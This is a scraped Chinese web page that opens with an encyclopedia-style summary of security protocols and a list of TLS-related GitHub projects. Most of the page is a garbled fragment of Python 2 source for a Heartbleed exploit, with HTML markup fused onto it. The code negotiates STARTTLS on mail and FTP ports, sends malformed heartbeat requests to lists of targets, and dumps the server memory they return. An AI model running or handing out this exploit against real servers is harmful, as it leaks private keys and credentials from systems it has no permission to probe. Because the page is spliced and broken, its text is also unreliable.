摘要(Abstract)

安全协议是以密码学为基础的消息交换协议,其目的是在网络环境中提供各种安全服务。密码学是网络安全的基础,但网络安全不能单纯依靠安全的密码算法。安全协议是网络安全的一个重要组成部分,我们需要通过安全协议进行实体之间的认证、在实体之间安全地分配密钥或其它各种秘密、确认发送和接收的消息的非否认性等。 协议参与者 认证协议:发起者/响应者。 签名协议:签名申请者/签署人/验证人。 零知识证明:证明者/验证者。 电子商务协议:商家/银行/用户。 攻击者编辑 (或称敌手) 内部攻击者/外部攻击者 被动攻击者/主动攻击者 性质编辑 安全协议的安全性质 机密性 完整性 认证性 非否认性 正确性 可验证性 公平性 匿名性 隐私属性 强健性 高效性 安全协议是建立在密码体制基础上的一种交互通信协议,它运用密码算法和协议逻辑来实现认证和密钥分配等目标。 密码协议(cryptographic protocol)是使用密码学完成某项特定的任务并满足安全需求的协议,又称安全协议(security protocol)。 在密码协议中,经常使用对称密码、公开密钥密码、单向函数、伪随机数生成器等。 中文名 安全协议 外文名 Security Protocol 别 名 密码协议 属 性 消息交换协议 作 用 提供各种安全服务

主题(Topic)



项目(Project)

tintinweb/striptls droe/sslsplit jbouwh/smtp-starttls-ciphers grawity/tls-cert-check adedayo/tlsaudit joseafon/netbsd-mailserver decal/ssltest-stls dotBATmanNO/PSGet-Domain-MailInfo 4commerce-technologies-AG/midi-smtp-server 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()" class="topic-tag topic-tag-link"> heartbleed.py